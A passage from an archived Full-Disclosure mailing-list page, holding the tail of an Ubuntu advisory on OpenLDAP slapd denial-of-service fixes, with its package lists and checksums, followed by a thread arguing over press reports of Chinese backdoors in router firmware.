2.2.26-5ubuntu2.6 Ubuntu 6.10: slapd 2.2.26-5ubuntu3.3 Ubuntu 7.04: slapd 2.3.30-2ubuntu0.2 Ubuntu 7.10: slapd 2.3.35-1ubuntu0.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jonathan Clarke discovered that the OpenLDAP slapd server did not properly handle modify requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modify permissions could send a crafted modify request and cause a denial of service via application crash. Ubuntu 7.10 is not affected by this issue. (CVE-2007-6698) Ralf Haferkamp discovered that the OpenLDAP slapd server did not properly handle modrdn requests when using the Berkeley DB backend and the NOOP control was used. An authenticated user with modrdn permissions could send a crafted modrdn request and possibly cause a denial of service via application crash. (CVE-2007-6698) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.6.diff.gz Size/MD5: 513643 5ec2226be9a7a7ed4b08c8c129943979 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu2.6.dsc Size/MD5: 1020 fa23dada98476932fb1e8c1e6d47a143 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz Size/MD5: 2626629 afc8700b5738da863b30208e1d3e9de8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 130552 9e5d6589617f2c98632b8c7c5a4f2afc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 165976 68032a07f814ef62556b539b17531161 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_amd64.deb Size/MD5: 961572 6074803431925962b7500f1223ecba0e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 118396 b8864fd7cb61e88cf5bd15ed5c87ce38 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 146100 27c057986763be36fd3b267ba1844bb2 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_i386.deb Size/MD5: 873016 c392b5a10d1973fe2d6c264d496a0424 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 132736 a21157c2d376e3b4cdd7fdb2e3b97a2e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 157168 a935b8931a79ec692fa3d10357feb811 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_powerpc.deb Size/MD5: 959554 bd801628bccfdc5624d9386d0fb6c2d1 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 120696 8efb65196a17efc1b397cadc874eb201 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 148180 83781a94080002f4363d2fd557cec845 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu2.6_sparc.deb Size/MD5: 903560 0ed257e45f1ae749cb3a0b4591328db4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.3.diff.gz Size/MD5: 514824 2e3cf6b4dbcfc951d00875df98394a0e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26-5ubuntu3.3.dsc Size/MD5: 1020 4cb25054b1a571a1c228d06b6fa8872a http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/openldap2.2_2.2.26.orig.tar.gz Size/MD5: 2626629 afc8700b5738da863b30208e1d3e9de8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.3_amd64.deb Size/MD5: 130748 cec7e5a6bbd103d02f59b171e6d3cc62 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.3_amd64.deb Size/MD5: 166720 eddb5a050a7637767c89f7f84b686bfc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.3_amd64.deb Size/MD5: 958496 551d5753a74f213bfc2cfd30849beae5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.3_i386.deb Size/MD5: 121340 35ae855094d28ba27c6adbd2dbe52125 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.3_i386.deb Size/MD5: 152528 69a0aff9de16526d748439e3c7328ed3 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.3_i386.deb Size/MD5: 900950 a594fcc12375717e00501ea309d19eff powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.3_powerpc.deb Size/MD5: 133704 fe69e3b733b16e50360836197f7cecdc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.3_powerpc.deb Size/MD5: 158892 7310d1dd87e09123350b9338ebf20216 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.3_powerpc.deb Size/MD5: 966698 424729c177d675a259d311d10aebbb18 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/ldap-utils_2.2.26-5ubuntu3.3_sparc.deb Size/MD5: 121598 f43c977b60ba22fa469141867d6bcfb2 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/libldap-2.2-7_2.2.26-5ubuntu3.3_sparc.deb Size/MD5: 149344 766dab29f1fd99af475b331440c4c4cc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.2/slapd_2.2.26-5ubuntu3.3_sparc.deb Size/MD5: 909576 733c2d21d553061af3bfb4d6792a24d1 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.2.diff.gz Size/MD5: 140603 0f1ab4e378c92fb2e12887ec9046e0cc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30-2ubuntu0.2.dsc Size/MD5: 1295 ee74d8bd01147a16a304705477171875 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz Size/MD5: 2971126 c40bcc23fa65908b8d7a86a4a6061251 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.2_amd64.deb Size/MD5: 187680 68efce79af7efe0a1d08201060361653 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.2_amd64.deb Size/MD5: 292344 da795196baacdaac42894aa055629bea http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.2_amd64.deb Size/MD5: 1228068 36e10789bdb22aa92428ec6d77d297b7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.2_i386.deb Size/MD5: 156110 034749aedc798753db0d9541c2c8b74e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.2_i386.deb Size/MD5: 267460 f0ffcab028cd2237b6dad5592c454659 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.2_i386.deb Size/MD5: 1154810 73212a3a90a50d0fa342e886b61993f3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.2_powerpc.deb Size/MD5: 203704 6f1d507298df6933ce5ac77fb52ebfb2 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.2_powerpc.deb Size/MD5: 294438 882c7302c977a3ef131b217ec8851eb7 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.2_powerpc.deb Size/MD5: 1280484 2b30e19235b699552a37db6aaa40e874 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.30-2ubuntu0.2_sparc.deb Size/MD5: 164430 d2e7b34d207937643dc45a3cdebd7e93 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.30-2ubuntu0.2_sparc.deb Size/MD5: 264284 245d63568559de9d2692b59e45a78462 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.30-2ubuntu0.2_sparc.deb Size/MD5: 1169954 44205386809e93336c4610c43fda8786 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.2.diff.gz Size/MD5: 151903 2cd8ba0d9c70957b9956e427809578b7 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35-1ubuntu0.2.dsc Size/MD5: 1305 57e636f0f209825bdab902f327bc5c9a http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/openldap2.3_2.3.35.orig.tar.gz Size/MD5: 2947629 5096146b7a7eb6ce3b0a97549347b5be amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.2_amd64.deb Size/MD5: 190006 3163216fad39b4f6f6eeb1d5a7a0dee6 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.2_amd64.deb Size/MD5: 347150 1ee13cb4baf6332cfc41842c56f24cbc http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.2_amd64.deb Size/MD5: 1296380 c833d82c46dcf383895269e4382fdb44 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.2_i386.deb Size/MD5: 155416 a55085d0ddd8c5efcf922cb4654ee432 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.2_i386.deb Size/MD5: 314722 1e36f20fb6a2c7edf227a32e7c15702d http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.2_i386.deb Size/MD5: 1216432 1e3cef622a3763e3f52c71cf799caf67 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.2_powerpc.deb Size/MD5: 205216 25bf9ad7302ac5bfdd7aa17316bbfc7d http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.2_powerpc.deb Size/MD5: 345862 3891c829c88334a631e29d3ab65f970e http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.2_powerpc.deb Size/MD5: 1345548 2b31e34aeb9db8cf819e5e9f64fb2499 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/ldap-utils_2.3.35-1ubuntu0.2_sparc.deb Size/MD5: 166440 9729d0640a24245d806a1eaa4da57e25 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/libldap-2.3-0_2.3.35-1ubuntu0.2_sparc.deb Size/MD5: 306882 7b8e476dcc15ce5d9d7b36de14617559 http://security.ubuntu.com/ubuntu/pool/main/o/openldap2.3/slapd_2.3.35-1ubuntu0.2_sparc.deb Size/MD5: 1229006 496bc48c65314709cb2bb0f2570b7881 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/72903a0e/attachment.bin From coderman at gmail.com Wed Mar 5 23:51:26 2008 From: coderman at gmail.com (coderman) Date: Wed, 5 Mar 2008 15:51:26 -0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html they also pwned my toothpaste and gave me diarrhea :( :( :( H A C K E D B Y C H I N E S E, LOLOLOLOLOL titan rain is dark comedy at its finest! (( how many orgs / govs actually do due diligence and audit third party hardware / software / systems they purchase ?? )) From ivanhec at gmail.com Thu Mar 6 00:07:09 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 11:07:09 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> Message-ID: <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> wouldn't be the first time that National intelligence agencies have comprised IT gear http://en.wikipedia.org/wiki/Crypto_AG On Thu, Mar 6, 2008 at 10:51 AM, coderman wrote: > On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > they also pwned my toothpaste and gave me diarrhea :( :( :( > > H A C K E D B Y C H I N E S E, LOLOLOLOLOL > > titan rain is dark comedy at its finest! > > (( how many orgs / govs actually do due diligence and audit third > party hardware / software / systems they purchase ?? )) > From coderman at gmail.com Thu Mar 6 00:20:02 2008 From: coderman at gmail.com (coderman) Date: Wed, 5 Mar 2008 16:20:02 -0800 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> <6450e99d0803051607q1192a8f2yc7bc072b84f21dc2@mail.gmail.com> Message-ID: <4ef5fec60803051620s6d7fd7f7j2c92601765375730@mail.gmail.com> On Wed, Mar 5, 2008 at 4:07 PM, Ivan . wrote: > wouldn't be the first time that National intelligence agencies have > comprised IT gear true; i just meant that an elaborate back door isn't even necessary when the front door lock can be bumped open (titan rain :) the athens affair is another fun example of the folly of running arbitrary and un tested / audited code on your infrastructure... http://spectrum.ieee.org/print/5280 From worriedsecurity at googlemail.com Thu Mar 6 00:25:52 2008 From: worriedsecurity at googlemail.com (worried security) Date: Thu, 6 Mar 2008 00:25:52 +0000 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <4ef5fec60803051551i5c6b6e81v98fb3a2f1866e4e9@mail.gmail.com> Message-ID: <67ea64530803051625p4f5065a5q48c848beeb3f6ddf@mail.gmail.com> On Wed, Mar 5, 2008 at 11:51 PM, coderman wrote: > On Wed, Mar 5, 2008 at 3:09 PM, Ivan . wrote: > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > they also pwned my toothpaste and gave me diarrhea :( :( :( > > H A C K E D B Y C H I N E S E, LOLOLOLOLOL > > titan rain is dark comedy at its finest! > > (( how many orgs / govs actually do due diligence and audit third > party hardware / software / systems they purchase ?? )) shut up coderman, this is actually a serious subject. there was even a .mil report about it that i spammed to the list a not long back :) no one paid attention though: http://www.thetrumpet.com/index.php?q=4524.2780.0.0 http://www.govexec.com/story_page.cfm?articleid=38713&dcn=todaysnews this is actually a serious subject i wanted securityfocus to cover but they ignored my e-mails! i also contacted cnet news at the time and they ignored my e-mails. pay attention to the security community next time! we're telling you things we want you to put in your news articles to send signals to the government but you ignore us. what's the point of this mailing list being here if the media won't work with the underground to send messages to the high ups in our corrupt governments? fuck the media! :) http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058845.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058850.html Date: Wed, 5 Dec 2007 08:33:09 +0000 From: n3td3v To: news-edi... at securityfocus.com, send-us-news-t... at cnet.com, Subject: Fwd: Report: Foreign Countries Develop U.S. Defense Systems Software Please can you publish this, America deserves to know how stupid Bush admin are. OK, we already knew how stupid they are, but please publish this cnet and securityfocus editors, its time to get the Bush admin and MI5 back for spewing all that anti-China propaganda to the media recently. Bush admin and MI5 are a bunch of incompetent bastards putting our national security at risk, how dare they put national security at risk by out sourcing its .mil software to the number 1 cyber enemy, CHINA. The truth comes out in the end!!! Its too LOL to be true. PUBLISH PUBLISH PUBLISH!!!!!!! The American people deserve to know the truth!!!!!! From quispiam.lepidus at gmail.com Thu Mar 6 01:26:47 2008 From: quispiam.lepidus at gmail.com (quispiam lepidus) Date: Thu, 6 Mar 2008 12:26:47 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: Typical media dramatization. No where in the article does it state that backdoors HAVE been found in router firmwares. Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota trunks" > > On Thu, Mar 6, 2008 at 10:09 AM, Ivan . wrote: > > > > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/cf3b6cd1/attachment.html From Larry at larryseltzer.com Thu Mar 6 01:37:39 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Wed, 5 Mar 2008 20:37:39 -0500 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> >>Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota trunks" And who knows what the French are putting in that cheese. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/42fb95f5/attachment.html From times at krr.org Thu Mar 6 01:47:44 2008 From: times at krr.org (Times Enemy) Date: Wed, 05 Mar 2008 18:47:44 -0700 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> Message-ID: <47CF4D40.1000107@krr.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota | trunks" | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ | | http://blogs.pcmag.com/securitywatch/ | | Contributing Editor, PC Magazine | larry.seltzer at ziffdavisenterprise.com | | | | | ------------------------------------------------------------------------ | | _______________________________________________ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -----END PGP SIGNATURE----- From ivanhec at gmail.com Thu Mar 6 01:58:11 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 12:58:11 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <6450e99d0803051758w73938649m9efbd4129930f639@mail.gmail.com> there is also the case of fake Cisco routers etc doing the rounds. Whether these devices are back doored is anyones guess http://news.zdnet.co.uk/communications/0,1000000085,39284348,00.htm http://www.voipforyourbusiness.com/index.php?option=com_content&task=view&id=115&Itemid=1 On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Greets. > > It does not matter so much if there is no hard proof about the router > firmware containing backdoors set in place by Chinese manufacturers. > ~From a security perspective, it is a potential threat which should be > addressed, especially for western networks and those they trust. > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > If you want to be inundated with reading material on the matter, be > creative, or not too creative, with Google searches having to do with > China and western powers and businesses, specific to information warfare. > > .te > > > Larry Seltzer wrote: > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > | trunks" > | > | And who knows what the French are putting in that cheese. > | Larry Seltzer > | eWEEK.com Security Center Editor > | http://security.eweek.com/ > | > | http://blogs.pcmag.com/securitywatch/ > | > | Contributing Editor, PC Magazine > | larry.seltzer at ziffdavisenterprise.com > | > | > | > | > | ------------------------------------------------------------------------ > | > | _______________________________________________ > | Full-Disclosure - We believe in it. > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > | Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.8 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > =RwKm > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From quispiam.lepidus at gmail.com Thu Mar 6 02:28:48 2008 From: quispiam.lepidus at gmail.com (quispiam lepidus) Date: Thu, 6 Mar 2008 13:28:48 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: Why stop at routers & switches? You could own far more devices by backdooring BIOS', HDD's, etc, all of which are often produced in "Far East countries". On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Greets. > > It does not matter so much if there is no hard proof about the router > firmware containing backdoors set in place by Chinese manufacturers. > ~From a security perspective, it is a potential threat which should be > addressed, especially for western networks and those they trust. > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > If you want to be inundated with reading material on the matter, be > creative, or not too creative, with Google searches having to do with > China and western powers and businesses, specific to information warfare. > > .te > > > Larry Seltzer wrote: > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > | trunks" > | > | And who knows what the French are putting in that cheese. > | Larry Seltzer > | eWEEK.com Security Center Editor > | http://security.eweek.com/ > | > | http://blogs.pcmag.com/securitywatch/ > | > | Contributing Editor, PC Magazine > | larry.seltzer at ziffdavisenterprise.com > | > | > | > | > | ------------------------------------------------------------------------ > | > | _______________________________________________ > | Full-Disclosure - We believe in it. > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > | Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.8 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > =RwKm > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/6f6a7184/attachment.html From ivanhec at gmail.com Thu Mar 6 02:45:10 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 13:45:10 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <6450e99d0803051845r70811cbaub647249036f1f767@mail.gmail.com> I dont think they have http://www.hqlaptops.com/hard-drives/infected-seagate-hard-drives http://www.taipeitimes.com/News/taiwan/archives/2007/11/11/2003387202 On Thu, Mar 6, 2008 at 1:28 PM, quispiam lepidus wrote: > Why stop at routers & switches? You could own far more devices by > backdooring BIOS', HDD's, etc, all of which are often produced in "Far East > countries". > > > > On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Greets. > > > > It does not matter so much if there is no hard proof about the router > > firmware containing backdoors set in place by Chinese manufacturers. > > ~From a security perspective, it is a potential threat which should be > > addressed, especially for western networks and those they trust. > > > > It is not too far fetched of an idea. Google yielded the following > > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > > > If you want to be inundated with reading material on the matter, be > > creative, or not too creative, with Google searches having to do with > > China and western powers and businesses, specific to information warfare. > > > > .te > > > > > > > > Larry Seltzer wrote: > > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > > | trunks" > > | > > | And who knows what the French are putting in that cheese. > > | Larry Seltzer > > | eWEEK.com Security Center Editor > > | http://security.eweek.com/ > > > > | > > | http://blogs.pcmag.com/securitywatch/ > > | > > | Contributing Editor, PC Magazine > > | larry.seltzer at ziffdavisenterprise.com > > | > > | > > | > > | > > | ------------------------------------------------------------------------ > > > > | > > | _______________________________________________ > > | Full-Disclosure - We believe in it. > > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > | Hosted and sponsored by Secunia - http://secunia.com/ > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.8 (MingW32) > > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > > =RwKm > > -----END PGP SIGNATURE----- > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From slash.pd at gmail.com Thu Mar 6 02:50:47 2008 From: slash.pd at gmail.com (Peter Dawson) Date: Wed, 5 Mar 2008 21:50:47 -0500 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: 